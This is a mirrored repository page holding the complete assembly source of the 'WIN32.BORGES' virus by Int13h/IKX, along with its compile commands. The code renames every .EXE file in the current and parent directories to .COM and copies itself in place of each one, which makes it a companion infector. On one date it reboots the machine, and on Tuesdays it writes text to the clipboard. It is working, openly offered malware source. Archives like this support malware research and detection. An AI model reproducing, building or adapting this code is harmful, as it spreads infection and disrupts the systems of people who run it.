mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 07:55:28 +00:00
214 lines
6.0 KiB
NASM
214 lines
6.0 KiB
NASM
|
; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
|
|||
|
; It mirrores EXEs files, navegates directories with the famous dot-dot;
|
|||
|
; method, on september 19 reboots the machine; on tuesdays puts a text;
|
|||
|
; in the clipboard. This beast works using API for all its operations,;
|
|||
|
; no dirty tricks are used. Just to mantain compatibility :);
|
|||
|
; Dedicated to Jorge Luis Borges, because the first tale of his book;
|
|||
|
; named "The book of sand" is called "The other", and it speaks about;
|
|||
|
; an encounter with a younger copy of himself. The famous doppelganger.;
|
|||
|
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
|
|||
|
; ;
|
|||
|
; COMPILATION: ;
|
|||
|
; tasm32 /ml /m3 borges.asm,,; ;
|
|||
|
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
|
|||
|
;
|
|||
|
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
locals
|
|||
|
|
|||
|
extrn FindFirstFileA:PROC
|
|||
|
extrn FindNextFileA:PROC
|
|||
|
extrn SetCurrentDirectoryA:PROC
|
|||
|
extrn GetCurrentDirectoryA:PROC
|
|||
|
extrn GetSystemTime:PROC
|
|||
|
extrn MoveFileA:PROC
|
|||
|
extrn CopyFileA:PROC
|
|||
|
extrn GlobalAlloc:PROC
|
|||
|
extrn GlobalLock:PROC
|
|||
|
extrn GlobalUnlock:PROC
|
|||
|
extrn OpenClipboard:PROC
|
|||
|
extrn SetClipboardData:PROC
|
|||
|
extrn EmptyClipboard:PROC
|
|||
|
extrn CloseClipboard:PROC
|
|||
|
extrn GetCommandLineA:PROC
|
|||
|
extrn CreateProcessA:PROC
|
|||
|
extrn lstrcpyA:PROC
|
|||
|
extrn MessageBoxA:PROC
|
|||
|
extrn ExitWindowsEx:PROC
|
|||
|
extrn ExitProcess:PROC
|
|||
|
|
|||
|
.DATA
|
|||
|
|
|||
|
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0
|
|||
|
TextoVentana db 'Made in Paraguay, South America',0
|
|||
|
MemHandle dd 0
|
|||
|
Victimas db '*.EXE',0
|
|||
|
SearcHandle dd 0
|
|||
|
Longitud dd 0
|
|||
|
ProcessInfo dd 4 dup (0)
|
|||
|
StartupInfo dd 4 dup (0)
|
|||
|
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
|
|||
|
Hallado db 200 dup (0)
|
|||
|
Crear db 200 dup (0)
|
|||
|
ParaCorrer db 200 dup (0)
|
|||
|
Original db 200 dup (0)
|
|||
|
Actual db 200 dup (0)
|
|||
|
PuntoPunto db '..',0
|
|||
|
SystemTimeStruc dw 0,0,0,0,0,0,0,0
|
|||
|
|
|||
|
|
|||
|
.CODE
|
|||
|
|
|||
|
BORGES: mov eax,offset SystemTimeStruc
|
|||
|
push eax
|
|||
|
call GetSystemTime
|
|||
|
|
|||
|
mov ax,word ptr offset [SystemTimeStruc+2]
|
|||
|
cmp al,9
|
|||
|
jne NoFQVbirthday
|
|||
|
|
|||
|
mov ax,word ptr offset [SystemTimeStruc+6]
|
|||
|
cmp al,17
|
|||
|
je Adios
|
|||
|
|
|||
|
NoFQVbirthday:
|
|||
|
push offset Original
|
|||
|
push 000000C8h
|
|||
|
call GetCurrentDirectoryA
|
|||
|
mov dword ptr [Longitud],eax
|
|||
|
|
|||
|
call GetCommandLineA
|
|||
|
push eax
|
|||
|
push offset ParaCorrer
|
|||
|
call lstrcpyA
|
|||
|
|
|||
|
mov edi,eax
|
|||
|
Buscar: cmp byte ptr [edi],'.'
|
|||
|
jz ElPunto
|
|||
|
inc edi
|
|||
|
jmp Buscar
|
|||
|
ElPunto:mov esi,edi
|
|||
|
inc esi
|
|||
|
add edi,4
|
|||
|
mov byte ptr [edi],00
|
|||
|
|
|||
|
Carrousell:
|
|||
|
call InfectDirectory
|
|||
|
push offset PuntoPunto
|
|||
|
call SetCurrentDirectoryA
|
|||
|
push offset Actual
|
|||
|
push 000000C8h
|
|||
|
call GetCurrentDirectoryA
|
|||
|
cmp eax,dword ptr [Longitud]
|
|||
|
je Salida
|
|||
|
mov dword ptr [Longitud],eax
|
|||
|
jmp Carrousell
|
|||
|
|
|||
|
InfectDirectory:
|
|||
|
push offset Win32FindData
|
|||
|
push offset Victimas
|
|||
|
call FindFirstFileA
|
|||
|
mov dword ptr [SearcHandle],eax
|
|||
|
Ciclo: cmp eax,-1
|
|||
|
je Salida
|
|||
|
or eax,eax
|
|||
|
jnz Continuar
|
|||
|
ret
|
|||
|
|
|||
|
Continuar:
|
|||
|
push offset Hallado
|
|||
|
push offset Crear
|
|||
|
call lstrcpyA
|
|||
|
|
|||
|
mov edi,offset Crear
|
|||
|
SeguirBuscando:
|
|||
|
cmp byte ptr [edi],'.'
|
|||
|
jz PuntoEncontrado
|
|||
|
inc edi
|
|||
|
jmp SeguirBuscando
|
|||
|
PuntoEncontrado:
|
|||
|
inc edi
|
|||
|
mov dword ptr [edi],0004d4f43h
|
|||
|
|
|||
|
push offset Crear
|
|||
|
push offset Hallado
|
|||
|
call MoveFileA
|
|||
|
|
|||
|
push 0
|
|||
|
push offset Hallado
|
|||
|
push offset ParaCorrer+1
|
|||
|
call CopyFileA
|
|||
|
|
|||
|
push offset Win32FindData
|
|||
|
push dword ptr [SearcHandle]
|
|||
|
call FindNextFileA
|
|||
|
jmp Ciclo
|
|||
|
|
|||
|
FillClipboard:
|
|||
|
push 0
|
|||
|
call OpenClipboard
|
|||
|
call EmptyClipboard
|
|||
|
push (offset TextoVentana-offset TituloVentana)
|
|||
|
push 00000002 ; GMEM_MOVEABLE
|
|||
|
call GlobalAlloc
|
|||
|
push eax
|
|||
|
mov dword ptr [MemHandle],eax
|
|||
|
call GlobalLock
|
|||
|
push eax
|
|||
|
push offset TituloVentana
|
|||
|
push eax
|
|||
|
call lstrcpyA
|
|||
|
call GlobalUnlock
|
|||
|
push dword ptr [MemHandle]
|
|||
|
push 00000001 ; CF_TEXT
|
|||
|
call SetClipboardData
|
|||
|
call CloseClipboard
|
|||
|
jmp Run4theNight
|
|||
|
|
|||
|
Adios: push 00000001
|
|||
|
push offset TituloVentana
|
|||
|
push offset TextoVentana
|
|||
|
push 0
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
push 0
|
|||
|
push 00000002 ; EWX_REBOOT
|
|||
|
call ExitWindowsEx
|
|||
|
|
|||
|
|
|||
|
Salida: push offset Original
|
|||
|
call SetCurrentDirectoryA
|
|||
|
|
|||
|
mov ax,word ptr offset [SystemTimeStruc+4]
|
|||
|
cmp al,2
|
|||
|
je FillClipboard
|
|||
|
|
|||
|
Run4theNight:
|
|||
|
push offset ProcessInfo
|
|||
|
push offset StartupInfo
|
|||
|
sub eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000010h
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call GetCommandLineA
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
|
|||
|
Done: mov dword ptr [esi],0004d4f43h
|
|||
|
push offset ParaCorrer+1
|
|||
|
call CreateProcessA
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
Ends
|
|||
|
End BORGES
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|